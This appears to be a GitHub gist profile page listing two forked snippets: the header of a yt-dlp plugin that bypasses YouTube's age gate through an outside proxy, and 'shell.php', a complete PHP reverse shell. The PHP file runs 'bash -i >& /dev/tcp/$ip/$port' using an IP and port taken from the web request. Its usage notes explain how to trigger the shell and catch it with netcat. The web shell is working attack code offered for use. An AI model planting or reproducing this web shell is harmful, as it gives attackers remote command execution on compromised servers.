Skip to content

Instantly share code, notes, and snippets.

View Spotlightsrule's full-sized avatar

Spotlightsrule Spotlightsrule

  • Spotrealms Network
View GitHub Profile
@Spotlightsrule
Spotlightsrule / Youtube_AgeGateBypass.py
Created August 10, 2022 02:19 — forked from pukkandan/Project moved
yt-dlp plugin to bypass youtube age-gate
"""
SPDX-License-Identifier: MIT https://opensource.org/licenses/MIT
Copyright © 2022 [email protected]
yt-dlp plugin extractor to bypass youtube age-gate
Needs yt-dlp 2022.04.08 or above
See https://github.com/yt-dlp/yt-dlp#plugins for how to use
Uses account proxy https://youtube-proxy.zerody.one by https://github.com/zerodytrash
@Spotlightsrule
Spotlightsrule / shell.php
Last active March 29, 2018 19:46 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
if (isset ($_REQUEST["shell"])){$ip = $_REQUEST["ip"];$port = $_REQUEST["port"];exec("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");}
?>
<!--
USAGE (reverse shell/server): url-to-file.php?shell&ip=<attacker ip>&port=<attacker port>
USAGE (reverse shell/client): (in netcat) nc -v -l -p <attacker port>
NOTE (reverse shell): The ip (lan if on the same network, wan if it's a remote server) and port of the attacker and target must be the same or else no connection will be established.
-->